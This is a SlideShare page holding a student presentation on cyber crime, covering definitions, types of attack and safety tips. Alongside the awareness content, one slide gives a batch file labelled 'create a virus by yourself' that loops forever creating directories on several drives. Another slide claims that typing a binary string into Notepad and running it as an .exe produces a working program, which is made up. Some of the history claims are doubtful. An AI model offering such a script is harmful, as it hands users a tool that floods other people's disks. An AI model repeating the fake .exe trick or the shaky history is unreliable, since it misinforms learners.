SlideShare a Scribd company logo
CYBER CRIME
Name-Ruhil
THE NORTHCAP
UNIVERSITY, GURUGRAM
 Introduction
 Definition
 History
 Categories
 Types
 Prevention
 Conclusion
Contents
 Computer crime or Cyber Crime is criminal activity
that involves unlawful access to computer systems.
 Cyber crime is an illegal activity committed on the
internet.
Introduction
Crime committed using a computer and the internet to steal
data or information.
Example:
 Stealing credit card information
 Breaking into government website
Definition
 The first cyber crime ever recorded was in France
during 1820.
 The person involved was Joseph-Marie.
 He was a textile manufacturer, he made looms.
 He invented looms that can store design.
History
 The first spam email took place in the year 1978.
 The first virus was installed on Apple Computer in the year
1982.
 The Computer as a Target:
Using a computer to attacks other computer. e.g. Hacking,
virus/worms attacks etc.
 The Computer as a Weapon:
Using a computer to commit real world crime e.g. Cyber
terrorism, credit card fraud etc.
Categories of Cyber Crime
 Hacking
 Credit Card Fraud
 Virus Dissemination
 Cyber Terrorism
 Computer Vandalism
 Software Piracy
 Spoofing
Types of Cyber Crime
Hacking is a source of threat to security in computer. It
is defined as unauthorized access to the computer
system by a hacker.
Types Of Hackers:
i. White Hat Hackers
ii. Black Hat Hackers
iii. Gray Hat Hackers
Hacking
 When an individual uses another individuals’ credit
card for personal reasons while the owner of the card
and the card issuer are not aware of the fact that the
card is being used.
 This problem occur while using online banking,
shopping.
Credit Card Fraud
 To avoid such a fraud the banks are now make a
privacy so that one can’t use the others credit card
because of the mobile security code and two steps
verification.
 Now this is an ethical conduct that is enforce by the
banks to avoid such type of hacking.
Malicious software that attaches itself to other
software.
Virus Dissemination
 Example to create a virus by yourself open your notepad
and write Following Code and paste it in notepad then Save
it as “anyname.bat".
 @echo off
 :VIRUS
 cd /d C:
 md %RANDOM%
 cd /d D:
 md %RANDOM%
 cd /d E:
 md %RANDOM%
 goto VIRUS
 Keep a regular backup of your important files.
 Be aware that most current viruses arrive as email
attachments. Be very aware of any attachment that has any
of the following file extensions: .exe .vbs .scr .vbe .com .bat
.shs .cpl .dll .ocx .pif .drv .lnk .bin .sys .eml .nws
 It is impossible for any anti-virus program to protect against
all new viruses, so your best protection is to be very
cautious about opening e-mail attachments.
 Use of Internet based attacks in terrorist activities.
 There are laws to prevent cyber crimes.
For example:
i. Seven Iranians working on behalf of Iranian
government indicted on hacking charges.
ii. Many persons has sent to jail recently in Rawalpindi
for blackmailing on the social media
Cyber Terrorism
 Damaging or destroying data rather than stealing.
 Transmitting virus.
 Ethical way to deal with computer vandalism is not to
give permissions to software without reading the
agreements.
Computer Vandalism
For Example:
 Write the Following code In Notepad Exactly as it says
 01001011000111110010010101010101010000011111100000
 Save as a .EXE -any name will do
 Run the .exe
 You are done !
 Theft of software through the illegal copying of
genuine programs.
Software Piracy
 Nowadays, no one is ready to use the original
software’s as they are too costly.
 Some of the organizations are now doing a serious
attempt against the people who are involved in the
distribution of pirated software’s.
 For Example:
BSA has many running cases.
 The word "spoof" means to trick, or deceive. Therefore, in
the IT world, spoofing refers tricking or deceiving
computer systems or other computer users. This is
typically done by hiding one's identity or faking the identity
of another user on the Internet.
 Spoofing can take place on the Internet in several
different ways:
 E-mail Spoofing
 IP Spoofing
 Fake Identity
Spoofing
 Always keep your computer system updated with a good
anti virus software
 Do not open the mail if you do not recognize the sender.
 Ignore any mails with comes without sender names
 Ignore any mail which has your name in the sender details
 Do not open any mails if it has only a link in the body of the
message
 Use antivirus software’s.
 Insert firewalls.
 Uninstall unnecessary software
 Maintain backup.
 Check security settings.
 Never give your full name or address to
strangers.
 Learn more about Internet privacy.
SAFETY TIPS FOR CYBER
CRIME
 Internet security is a branch of computer
 security specifically related to the Internet.
 It's objective is to establish rules and measure to use
against attacks over the Internet
Cyber Security
 Defend us from critical attacks.
 Browse the safe website.
 Internet security process all the incoming and
outgoing data on our computer.
ADVANTAGES OF CYBER
SECURITY
 As someone rightly said that “bytes are replacing
bullets in the crime world”.
 The key to protecting yourself is being aware.
 Not all cybercriminals are “hackers.”
 There is a whole other world that exists in
cyberspace, make sure that your information travels
safely.
 Stay Secure.
Conclusion
Cyber crime

More Related Content

What's hot

cyber crime, Cyber Security, Introduction, Umakant Bhaskar Gohatre
cyber crime, Cyber Security, Introduction, Umakant Bhaskar Gohatre cyber crime, Cyber Security, Introduction, Umakant Bhaskar Gohatre
cyber crime, Cyber Security, Introduction, Umakant Bhaskar Gohatre
Smt. Indira Gandhi College of Engineering, Navi Mumbai, Mumbai
 
Web Security
Web SecurityWeb Security
Web Security
Tripad M
 
Cyber crime and security threads
Cyber crime and security threadsCyber crime and security threads
Cyber crime and security threads
Vdidv
 
CLASS VII COMPUTER SECURITY
CLASS VII COMPUTER SECURITYCLASS VII COMPUTER SECURITY
CLASS VII COMPUTER SECURITY
Rc Os
 
Computer Security and safety
Computer Security and safety Computer Security and safety
Computer Security and safety
Sadaf Walliyani
 
Cyber security presentation
Cyber security presentationCyber security presentation
Cyber security presentation
Parab Mishra
 
Cyber crime
Cyber crimeCyber crime
Cyber crime
Abdul Karim
 
Cyber Security Awareness
Cyber Security AwarenessCyber Security Awareness
Cyber Security Awareness
Innocent Korie
 
Wong Pau Tung-special-topic-02-Virus
Wong Pau Tung-special-topic-02-VirusWong Pau Tung-special-topic-02-Virus
Wong Pau Tung-special-topic-02-Virus
sharing notes123
 
Computer Security Presentation
Computer Security PresentationComputer Security Presentation
Computer Security Presentation
PraphullaShrestha1
 
General Awareness On Cyber Security
General Awareness On Cyber SecurityGeneral Awareness On Cyber Security
General Awareness On Cyber Security
Dominic Rajesh
 
Cyber security
Cyber securityCyber security
Cyber security
manoj duli
 
Cyber Security and Cyber Awareness
Cyber Security and Cyber Awareness Cyber Security and Cyber Awareness
Cyber Security and Cyber Awareness
Jay Nagar
 
The Malware Menace
The Malware MenaceThe Malware Menace
The Malware Menace
Tami Brass
 
Hacking and virus presentation
Hacking and virus presentationHacking and virus presentation
Hacking and virus presentation
Phương Anh Pađi
 
Computer & internet Security
Computer & internet SecurityComputer & internet Security
Computer & internet Security
Gerard Lamusse
 
CYBER ETHICS, CRIMES AND SAFTY
CYBER ETHICS, CRIMES AND SAFTYCYBER ETHICS, CRIMES AND SAFTY
CYBER ETHICS, CRIMES AND SAFTY
FaMulan2
 
Cyber security awareness
Cyber security awarenessCyber security awareness
Cyber security awareness
Jason Murray
 
Ppt on cyber security
Ppt on cyber securityPpt on cyber security
Ppt on cyber security
Avani Patel
 

What's hot (19)

cyber crime, Cyber Security, Introduction, Umakant Bhaskar Gohatre
cyber crime, Cyber Security, Introduction, Umakant Bhaskar Gohatre cyber crime, Cyber Security, Introduction, Umakant Bhaskar Gohatre
cyber crime, Cyber Security, Introduction, Umakant Bhaskar Gohatre
 
Web Security
Web SecurityWeb Security
Web Security
 
Cyber crime and security threads
Cyber crime and security threadsCyber crime and security threads
Cyber crime and security threads
 
CLASS VII COMPUTER SECURITY
CLASS VII COMPUTER SECURITYCLASS VII COMPUTER SECURITY
CLASS VII COMPUTER SECURITY
 
Computer Security and safety
Computer Security and safety Computer Security and safety
Computer Security and safety
 
Cyber security presentation
Cyber security presentationCyber security presentation
Cyber security presentation
 
Cyber crime
Cyber crimeCyber crime
Cyber crime
 
Cyber Security Awareness
Cyber Security AwarenessCyber Security Awareness
Cyber Security Awareness
 
Wong Pau Tung-special-topic-02-Virus
Wong Pau Tung-special-topic-02-VirusWong Pau Tung-special-topic-02-Virus
Wong Pau Tung-special-topic-02-Virus
 
Computer Security Presentation
Computer Security PresentationComputer Security Presentation
Computer Security Presentation
 
General Awareness On Cyber Security
General Awareness On Cyber SecurityGeneral Awareness On Cyber Security
General Awareness On Cyber Security
 
Cyber security
Cyber securityCyber security
Cyber security
 
Cyber Security and Cyber Awareness
Cyber Security and Cyber Awareness Cyber Security and Cyber Awareness
Cyber Security and Cyber Awareness
 
The Malware Menace
The Malware MenaceThe Malware Menace
The Malware Menace
 
Hacking and virus presentation
Hacking and virus presentationHacking and virus presentation
Hacking and virus presentation
 
Computer & internet Security
Computer & internet SecurityComputer & internet Security
Computer & internet Security
 
CYBER ETHICS, CRIMES AND SAFTY
CYBER ETHICS, CRIMES AND SAFTYCYBER ETHICS, CRIMES AND SAFTY
CYBER ETHICS, CRIMES AND SAFTY
 
Cyber security awareness
Cyber security awarenessCyber security awareness
Cyber security awareness
 
Ppt on cyber security
Ppt on cyber securityPpt on cyber security
Ppt on cyber security
 

Similar to Cyber crime

Cyber Crime
Cyber CrimeCyber Crime
Cyber Crime
Mazhar Nazik
 
Computer Crime
Computer CrimeComputer Crime
Computer Crime
Prothom Alo
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
Tushar Nikam
 
Computer crime
Computer crimeComputer crime
Computer crime
Vishesh Dalal
 
Cyber crime and security 1
Cyber crime and security 1Cyber crime and security 1
Cyber crime and security 1
indhuchezhian
 
presentation on cyber crime and security
presentation on cyber crime and securitypresentation on cyber crime and security
presentation on cyber crime and security
Alisha Korpal
 
Cyber crime and security
Cyber crime and security Cyber crime and security
Cyber crime and security
BasitShah18
 
Cyber crime and security
Cyber crime and securityCyber crime and security
Cyber crime and security
Akash Dhiman
 
Cyber Crime & Security
Cyber Crime & SecurityCyber Crime & Security
Cyber Crime & Security
Sanjeev Kumar Jaiswal
 
Cyber Crime
Cyber CrimeCyber Crime
Cyber Crime
zahid_ned
 
Presentation on cyber security
Presentation on cyber securityPresentation on cyber security
Presentation on cyber security
9784
 
cyber crime
cyber crime cyber crime
cyber crime
Midhun Suresh
 
Cybersecurity Awareness Month_2021_PartnerPresentation_Final.pdf
Cybersecurity Awareness Month_2021_PartnerPresentation_Final.pdfCybersecurity Awareness Month_2021_PartnerPresentation_Final.pdf
Cybersecurity Awareness Month_2021_PartnerPresentation_Final.pdf
Soo Chin Hock
 
Guest Lecture-Computer and Cyber Security.pptx
Guest Lecture-Computer and Cyber Security.pptxGuest Lecture-Computer and Cyber Security.pptx
Guest Lecture-Computer and Cyber Security.pptx
GudipudiDayanandam
 
Cyber Crime and Security
Cyber Crime and SecurityCyber Crime and Security
Cyber Crime and Security
Chitra Mudunuru
 
Cyber crime & security
Cyber crime & security Cyber crime & security
Cyber crime & security
aravindanvaithilinga
 
Research paper on cyber security.
Research paper on cyber security.Research paper on cyber security.
Research paper on cyber security.
Hussain777
 
Cybercrime the emerging threat
Cybercrime the emerging threatCybercrime the emerging threat
Cybercrime the emerging threat
ANKUR BAROT
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
Vivek Agarwal
 
Cybercrime
Cybercrime Cybercrime
Cybercrime
Anuj Bhardwaj
 

Similar to Cyber crime (20)

Cyber Crime
Cyber CrimeCyber Crime
Cyber Crime
 
Computer Crime
Computer CrimeComputer Crime
Computer Crime
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 
Computer crime
Computer crimeComputer crime
Computer crime
 
Cyber crime and security 1
Cyber crime and security 1Cyber crime and security 1
Cyber crime and security 1
 
presentation on cyber crime and security
presentation on cyber crime and securitypresentation on cyber crime and security
presentation on cyber crime and security
 
Cyber crime and security
Cyber crime and security Cyber crime and security
Cyber crime and security
 
Cyber crime and security
Cyber crime and securityCyber crime and security
Cyber crime and security
 
Cyber Crime & Security
Cyber Crime & SecurityCyber Crime & Security
Cyber Crime & Security
 
Cyber Crime
Cyber CrimeCyber Crime
Cyber Crime
 
Presentation on cyber security
Presentation on cyber securityPresentation on cyber security
Presentation on cyber security
 
cyber crime
cyber crime cyber crime
cyber crime
 
Cybersecurity Awareness Month_2021_PartnerPresentation_Final.pdf
Cybersecurity Awareness Month_2021_PartnerPresentation_Final.pdfCybersecurity Awareness Month_2021_PartnerPresentation_Final.pdf
Cybersecurity Awareness Month_2021_PartnerPresentation_Final.pdf
 
Guest Lecture-Computer and Cyber Security.pptx
Guest Lecture-Computer and Cyber Security.pptxGuest Lecture-Computer and Cyber Security.pptx
Guest Lecture-Computer and Cyber Security.pptx
 
Cyber Crime and Security
Cyber Crime and SecurityCyber Crime and Security
Cyber Crime and Security
 
Cyber crime & security
Cyber crime & security Cyber crime & security
Cyber crime & security
 
Research paper on cyber security.
Research paper on cyber security.Research paper on cyber security.
Research paper on cyber security.
 
Cybercrime the emerging threat
Cybercrime the emerging threatCybercrime the emerging threat
Cybercrime the emerging threat
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 
Cybercrime
Cybercrime Cybercrime
Cybercrime
 

Recently uploaded

Dominate Reddit Discussions.............
Dominate Reddit Discussions.............Dominate Reddit Discussions.............
Dominate Reddit Discussions.............
SocioCosmos
 
HOW TO USE FACEBOOK _ by Clarissa Credito
HOW TO USE FACEBOOK _ by Clarissa CreditoHOW TO USE FACEBOOK _ by Clarissa Credito
HOW TO USE FACEBOOK _ by Clarissa Credito
ClarissaAlanoCredito
 
Lifecycle of a GME Trader: From Newbie to Diamond Hands
Lifecycle of a GME Trader: From Newbie to Diamond HandsLifecycle of a GME Trader: From Newbie to Diamond Hands
Lifecycle of a GME Trader: From Newbie to Diamond Hands
mediavestfzllc
 
STUDY ON THE DEVELOPMENT STRATEGY OF HUZHOU TOURISM
STUDY ON THE DEVELOPMENT STRATEGY OF HUZHOU TOURISMSTUDY ON THE DEVELOPMENT STRATEGY OF HUZHOU TOURISM
STUDY ON THE DEVELOPMENT STRATEGY OF HUZHOU TOURISM
AJHSSR Journal
 
快速办理(BCR毕业证书)加州大学河滨分校毕业证文凭证书一模一样
快速办理(BCR毕业证书)加州大学河滨分校毕业证文凭证书一模一样快速办理(BCR毕业证书)加州大学河滨分校毕业证文凭证书一模一样
快速办理(BCR毕业证书)加州大学河滨分校毕业证文凭证书一模一样
ryxqoswi
 
HMS Facebook Stories All V1 06092024.docx
HMS Facebook Stories All V1 06092024.docxHMS Facebook Stories All V1 06092024.docx
HMS Facebook Stories All V1 06092024.docx
Charles Bayless
 
HOW TO USE THREADS an Instagram App_ by Clarissa Credito
HOW TO USE THREADS an Instagram App_ by Clarissa CreditoHOW TO USE THREADS an Instagram App_ by Clarissa Credito
HOW TO USE THREADS an Instagram App_ by Clarissa Credito
ClarissaAlanoCredito
 
The Evolution of SEO: Insights from a Leading Digital Marketing Agency
The Evolution of SEO: Insights from a Leading Digital Marketing AgencyThe Evolution of SEO: Insights from a Leading Digital Marketing Agency
The Evolution of SEO: Insights from a Leading Digital Marketing Agency
Digital Marketing Lab
 
LORRAINE ANDREI_LEQUIGAN_HOW TO USE TELEGRAM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE TELEGRAMLORRAINE ANDREI_LEQUIGAN_HOW TO USE TELEGRAM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE TELEGRAM
lorraineandreiamcidl
 
EASY TUTORIAL OF HOW TO USE G-TEAMS BY: FEBLESS HERNANE
EASY TUTORIAL OF HOW TO USE G-TEAMS BY: FEBLESS HERNANEEASY TUTORIAL OF HOW TO USE G-TEAMS BY: FEBLESS HERNANE
EASY TUTORIAL OF HOW TO USE G-TEAMS BY: FEBLESS HERNANE
Febless Hernane
 
原版制作(Hull毕业证书)赫尔大学毕业证Offer一模一样
原版制作(Hull毕业证书)赫尔大学毕业证Offer一模一样原版制作(Hull毕业证书)赫尔大学毕业证Offer一模一样
原版制作(Hull毕业证书)赫尔大学毕业证Offer一模一样
7lkkjxt
 
Project Serenity — 33% Life-time Commissions.docx
Project Serenity — 33% Life-time Commissions.docxProject Serenity — 33% Life-time Commissions.docx
Project Serenity — 33% Life-time Commissions.docx
zeqirielmedina8
 
EASY TUTORIAL OF HOW TO USE REMINI BY: FEBLESS HERNANE
EASY TUTORIAL OF HOW TO USE REMINI BY: FEBLESS HERNANEEASY TUTORIAL OF HOW TO USE REMINI BY: FEBLESS HERNANE
EASY TUTORIAL OF HOW TO USE REMINI BY: FEBLESS HERNANE
Febless Hernane
 
Your LinkedIn Success Starts Here.......
Your LinkedIn Success Starts Here.......Your LinkedIn Success Starts Here.......
Your LinkedIn Success Starts Here.......
SocioCosmos
 
UR BHATTI ACADEMY AND ONLINE COURSES.pdf
UR BHATTI ACADEMY AND ONLINE COURSES.pdfUR BHATTI ACADEMY AND ONLINE COURSES.pdf
UR BHATTI ACADEMY AND ONLINE COURSES.pdf
urbhattiacademy
 

Recently uploaded (15)

Dominate Reddit Discussions.............
Dominate Reddit Discussions.............Dominate Reddit Discussions.............
Dominate Reddit Discussions.............
 
HOW TO USE FACEBOOK _ by Clarissa Credito
HOW TO USE FACEBOOK _ by Clarissa CreditoHOW TO USE FACEBOOK _ by Clarissa Credito
HOW TO USE FACEBOOK _ by Clarissa Credito
 
Lifecycle of a GME Trader: From Newbie to Diamond Hands
Lifecycle of a GME Trader: From Newbie to Diamond HandsLifecycle of a GME Trader: From Newbie to Diamond Hands
Lifecycle of a GME Trader: From Newbie to Diamond Hands
 
STUDY ON THE DEVELOPMENT STRATEGY OF HUZHOU TOURISM
STUDY ON THE DEVELOPMENT STRATEGY OF HUZHOU TOURISMSTUDY ON THE DEVELOPMENT STRATEGY OF HUZHOU TOURISM
STUDY ON THE DEVELOPMENT STRATEGY OF HUZHOU TOURISM
 
快速办理(BCR毕业证书)加州大学河滨分校毕业证文凭证书一模一样
快速办理(BCR毕业证书)加州大学河滨分校毕业证文凭证书一模一样快速办理(BCR毕业证书)加州大学河滨分校毕业证文凭证书一模一样
快速办理(BCR毕业证书)加州大学河滨分校毕业证文凭证书一模一样
 
HMS Facebook Stories All V1 06092024.docx
HMS Facebook Stories All V1 06092024.docxHMS Facebook Stories All V1 06092024.docx
HMS Facebook Stories All V1 06092024.docx
 
HOW TO USE THREADS an Instagram App_ by Clarissa Credito
HOW TO USE THREADS an Instagram App_ by Clarissa CreditoHOW TO USE THREADS an Instagram App_ by Clarissa Credito
HOW TO USE THREADS an Instagram App_ by Clarissa Credito
 
The Evolution of SEO: Insights from a Leading Digital Marketing Agency
The Evolution of SEO: Insights from a Leading Digital Marketing AgencyThe Evolution of SEO: Insights from a Leading Digital Marketing Agency
The Evolution of SEO: Insights from a Leading Digital Marketing Agency
 
LORRAINE ANDREI_LEQUIGAN_HOW TO USE TELEGRAM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE TELEGRAMLORRAINE ANDREI_LEQUIGAN_HOW TO USE TELEGRAM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE TELEGRAM
 
EASY TUTORIAL OF HOW TO USE G-TEAMS BY: FEBLESS HERNANE
EASY TUTORIAL OF HOW TO USE G-TEAMS BY: FEBLESS HERNANEEASY TUTORIAL OF HOW TO USE G-TEAMS BY: FEBLESS HERNANE
EASY TUTORIAL OF HOW TO USE G-TEAMS BY: FEBLESS HERNANE
 
原版制作(Hull毕业证书)赫尔大学毕业证Offer一模一样
原版制作(Hull毕业证书)赫尔大学毕业证Offer一模一样原版制作(Hull毕业证书)赫尔大学毕业证Offer一模一样
原版制作(Hull毕业证书)赫尔大学毕业证Offer一模一样
 
Project Serenity — 33% Life-time Commissions.docx
Project Serenity — 33% Life-time Commissions.docxProject Serenity — 33% Life-time Commissions.docx
Project Serenity — 33% Life-time Commissions.docx
 
EASY TUTORIAL OF HOW TO USE REMINI BY: FEBLESS HERNANE
EASY TUTORIAL OF HOW TO USE REMINI BY: FEBLESS HERNANEEASY TUTORIAL OF HOW TO USE REMINI BY: FEBLESS HERNANE
EASY TUTORIAL OF HOW TO USE REMINI BY: FEBLESS HERNANE
 
Your LinkedIn Success Starts Here.......
Your LinkedIn Success Starts Here.......Your LinkedIn Success Starts Here.......
Your LinkedIn Success Starts Here.......
 
UR BHATTI ACADEMY AND ONLINE COURSES.pdf
UR BHATTI ACADEMY AND ONLINE COURSES.pdfUR BHATTI ACADEMY AND ONLINE COURSES.pdf
UR BHATTI ACADEMY AND ONLINE COURSES.pdf
 

Cyber crime

  • 2.  Introduction  Definition  History  Categories  Types  Prevention  Conclusion Contents
  • 3.  Computer crime or Cyber Crime is criminal activity that involves unlawful access to computer systems.  Cyber crime is an illegal activity committed on the internet. Introduction
  • 4. Crime committed using a computer and the internet to steal data or information. Example:  Stealing credit card information  Breaking into government website Definition
  • 5.  The first cyber crime ever recorded was in France during 1820.  The person involved was Joseph-Marie.  He was a textile manufacturer, he made looms.  He invented looms that can store design. History
  • 6.  The first spam email took place in the year 1978.  The first virus was installed on Apple Computer in the year 1982.
  • 7.  The Computer as a Target: Using a computer to attacks other computer. e.g. Hacking, virus/worms attacks etc.  The Computer as a Weapon: Using a computer to commit real world crime e.g. Cyber terrorism, credit card fraud etc. Categories of Cyber Crime
  • 8.  Hacking  Credit Card Fraud  Virus Dissemination  Cyber Terrorism  Computer Vandalism  Software Piracy  Spoofing Types of Cyber Crime
  • 9. Hacking is a source of threat to security in computer. It is defined as unauthorized access to the computer system by a hacker. Types Of Hackers: i. White Hat Hackers ii. Black Hat Hackers iii. Gray Hat Hackers Hacking
  • 10.  When an individual uses another individuals’ credit card for personal reasons while the owner of the card and the card issuer are not aware of the fact that the card is being used.  This problem occur while using online banking, shopping. Credit Card Fraud
  • 11.  To avoid such a fraud the banks are now make a privacy so that one can’t use the others credit card because of the mobile security code and two steps verification.  Now this is an ethical conduct that is enforce by the banks to avoid such type of hacking.
  • 12. Malicious software that attaches itself to other software. Virus Dissemination
  • 13.  Example to create a virus by yourself open your notepad and write Following Code and paste it in notepad then Save it as “anyname.bat".  @echo off  :VIRUS  cd /d C:  md %RANDOM%  cd /d D:  md %RANDOM%  cd /d E:  md %RANDOM%  goto VIRUS
  • 14.  Keep a regular backup of your important files.  Be aware that most current viruses arrive as email attachments. Be very aware of any attachment that has any of the following file extensions: .exe .vbs .scr .vbe .com .bat .shs .cpl .dll .ocx .pif .drv .lnk .bin .sys .eml .nws  It is impossible for any anti-virus program to protect against all new viruses, so your best protection is to be very cautious about opening e-mail attachments.
  • 15.  Use of Internet based attacks in terrorist activities.  There are laws to prevent cyber crimes. For example: i. Seven Iranians working on behalf of Iranian government indicted on hacking charges. ii. Many persons has sent to jail recently in Rawalpindi for blackmailing on the social media Cyber Terrorism
  • 16.  Damaging or destroying data rather than stealing.  Transmitting virus.  Ethical way to deal with computer vandalism is not to give permissions to software without reading the agreements. Computer Vandalism
  • 17. For Example:  Write the Following code In Notepad Exactly as it says  01001011000111110010010101010101010000011111100000  Save as a .EXE -any name will do  Run the .exe  You are done !
  • 18.  Theft of software through the illegal copying of genuine programs. Software Piracy
  • 19.  Nowadays, no one is ready to use the original software’s as they are too costly.  Some of the organizations are now doing a serious attempt against the people who are involved in the distribution of pirated software’s.  For Example: BSA has many running cases.
  • 20.  The word "spoof" means to trick, or deceive. Therefore, in the IT world, spoofing refers tricking or deceiving computer systems or other computer users. This is typically done by hiding one's identity or faking the identity of another user on the Internet.  Spoofing can take place on the Internet in several different ways:  E-mail Spoofing  IP Spoofing  Fake Identity Spoofing
  • 21.  Always keep your computer system updated with a good anti virus software  Do not open the mail if you do not recognize the sender.  Ignore any mails with comes without sender names  Ignore any mail which has your name in the sender details  Do not open any mails if it has only a link in the body of the message
  • 22.  Use antivirus software’s.  Insert firewalls.  Uninstall unnecessary software  Maintain backup.  Check security settings.  Never give your full name or address to strangers.  Learn more about Internet privacy. SAFETY TIPS FOR CYBER CRIME
  • 23.  Internet security is a branch of computer  security specifically related to the Internet.  It's objective is to establish rules and measure to use against attacks over the Internet Cyber Security
  • 24.  Defend us from critical attacks.  Browse the safe website.  Internet security process all the incoming and outgoing data on our computer. ADVANTAGES OF CYBER SECURITY
  • 25.  As someone rightly said that “bytes are replacing bullets in the crime world”.  The key to protecting yourself is being aware.  Not all cybercriminals are “hackers.”  There is a whole other world that exists in cyberspace, make sure that your information travels safely.  Stay Secure. Conclusion